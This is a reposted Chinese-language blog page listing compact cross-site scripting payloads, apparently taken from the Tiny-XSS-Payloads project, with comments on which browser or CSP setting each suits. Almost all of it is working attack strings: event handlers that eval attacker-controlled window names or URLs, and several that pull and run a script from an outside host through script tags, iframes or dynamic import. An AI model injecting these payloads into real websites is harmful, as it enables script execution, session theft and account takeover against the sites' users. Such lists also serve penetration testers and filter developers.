XSS-Payloads集合

x33g5p2x  于2021-10-31 转载在 其他  
字(1.7k)|赞(0)|评价(0)|浏览(406)

XSS-Payloads

  1. <!-- 仅适用于反射型XSS --!>
  2. <svg/onload=eval(name)>
  1. <!-- 如果你控制了 URL -->
  2. <svg/onload=eval(`'`+URL)>
  1. <!-- 如果你控制了名字,但是 unsafe-eval 没有启用 -->
  2. <svg/onload=location=name>
  1. <!-- 在 chrome 中,也适用于 innerHTML,即使在尚未插入 DOM 的元素上 -->
  2. <svg><svg/onload=eval(name)>
  1. <!-- 如果您控制窗口的名称,此有效负载将在innerHTML 内工作,即使在尚未插入DOM 的元素上-->
  2. <audio/src/onerror=eval(name)>
  1. <!-- 如果您控制 URL,此有效负载将在 innerHTML 内工作,即使在尚未插入 DOM 的元素上 -->
  2. <img/src/onerror=eval(`'`+URL)>
  1. <!-- 随便一个脚本 -->
  2. <script/src=//NJ.₨></script>
  1. <!-- 如果你控制了窗口的名字 -->
  2. <iframe/onload=src=top.name>
  1. <!-- 如果你控制了 URL -->
  2. <iframe/onload=eval(`'`+URL)>
  1. <!-- 如果页面上的 iframe 数量不变 -->
  2. <iframe/onload=src=top[0].name+/\NJ.₨?/>
  1. <!-- 仅适用于 Firefox -->
  2. <iframe/srcdoc="<svg><script/href=//NJ.₨ />">
  1. <!-- 如果页面上的 iframe 数量是随机的 -->
  2. <iframe/onload=src=contentWindow.name+/\NJ.₨?/>
  1. <!-- 如果在 CSP 中禁用 unsafe-inline 并且允许外部脚本 -->
  2. <iframe/srcdoc="<script/src=//NJ.₨></script>">
  1. <!-- 如果允许内联样式 -->
  2. <style/onload=eval(name)>
  1. <!-- 如果允许内联样式并且可以控制 URL -->
  2. <style/onload=eval(`'`+URL)>
  1. <!-- 如果内联样式被阻止 -->
  2. <style/onerror=eval(name)>
  1. <!-- 使用外部脚本作为导入,在innerHTML 中不起作用,除非Firefox -->
  1. <!-- PoC 仅适用于 https 和 Chrome,因为 NJ.₨ 检查 Sec-Fetch-Dest 标头 -->
  2. <svg/onload=import(/\\NJ.₨/)>
  1. <!-- 使用外部脚本作为导入,如果允许内联样式则触发。
  2. <!-- PoC 仅适用于 https 和 Chrome,因为 NJ.₨ 检查 Sec-Fetch-Dest 标头 -->
  3. <style/onload=import(/\\NJ.₨/)>
  1. <!-- 使用外部脚本作为导入 -->
  2. <!-- PoC 仅适用于 https 和 Chrome,因为 NJ.₨ 检查 Sec-Fetch-Dest 标头 -->
  3. <iframe/onload=import(/\\NJ.₨/)>

弃用

  1. <!-- 如果你控制了网址,Safari-only -->
  2. <iframe/onload=write(URL)>
  1. <!-- 如果允许内联样式,仅 Safari -->
  2. <style/onload=write(URL)>

参考链接

  1. https://github.com/terjanq/Tiny-XSS-Payloads#current-payloads

相关文章